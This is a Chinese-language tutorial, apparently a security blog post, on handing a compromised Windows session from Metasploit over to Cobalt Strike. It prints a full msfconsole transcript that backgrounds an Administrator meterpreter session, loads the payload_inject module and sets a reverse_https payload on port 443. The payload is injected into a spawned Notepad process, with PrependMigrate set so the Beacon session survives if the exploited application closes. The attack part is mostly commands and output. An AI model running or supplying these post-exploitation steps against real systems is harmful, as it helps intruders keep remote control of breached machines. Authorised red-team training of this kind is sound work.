安全工具|Cobalt Strike与Metasploit会话互转安全工具|安全

一、前言 Cobalt Strike 和 Metasploit 是渗透测试经常会用到的两个工具，Cobalt Strike 与 Metasploit在很多地方都是兼容的，所以我们便可以将 Metasploit 攻击产生的会话传递到 Cobalt Strike 上，同样的 Cobalt Strike 的会话也能够传递到 Metasploit上。
二、Metasploit会话转到Cobaltstrike 【安全工具|Cobalt Strike与Metasploit会话互转】1、首先通过Metasploit获取会话。

文章图片

2、开启 Cobalt Strike ，设置监听。

文章图片

3、会话互转，使用windows/local/payload_inject模块。

文章图片

详情如下。

meterpreter > background [*] Backgrounding session 1... msf6 exploit(multi/handler) > sessions -lActive sessions ===============IdNameTypeInformationConnection ------------------------------- 1meterpreter x86/windowsSTU1\Administrator @ STU1192.168.60.65:4444 -> 192.168.60.84:2425 (192.168.60.84)msf6 exploit(multi/handler) > use exploit/windows/local/payload_inject [*] No payload configured, defaulting to windows/meterpreter/reverse_tcp msf6 exploit(windows/local/payload_inject) > set payload windows/meterpreter/reverse_https payload => windows/meterpreter/reverse_https msf6 exploit(windows/local/payload_inject) > set lport 443 lport => 443 msf6 exploit(windows/local/payload_inject) > set DisablePayloadHandler true DisablePayloadHandler => true msf6 exploit(windows/local/payload_inject) > set PrependMigrate true PrependMigrate => true msf6 exploit(windows/local/payload_inject) > set session 1 session => 1 msf6 exploit(windows/local/payload_inject) > run[*] Running module against STU1 [*] Spawned Notepad process 3504 [*] Injecting payload into 3504 [*] Preparing 'windows/meterpreter/reverse_https' for PID 3504 msf6 exploit(windows/local/payload_inject) >

（1）windows/local/payload_inject 使用该模块可以将 Metasploit 获取到的会话注入到CS中。
（2）set DisablePayloadHandler true 用来禁用 Metasploit payload handler的监听，目的就是告诉 Metasploit，我们已经建立了监听器，不必再新建监听器了，避免在 Metasploit 内再起一个 handler 来服务你的 payload 连接。
（3）set PrependMigrate true 用来启用迁移进程，这个操作可以前置MSF shellcode 在另一个进程中运行，如果被利用的应用程序崩溃或被用户关闭，MSF中的会话断开，但转到CS的 Beacon 会话仍然是存活的，该选项可选。
4、如下，当在MSF中执行完如上操作之后，可能需要等待一会，就可以看到Cobalt Strike 接收到传递过来的会话了。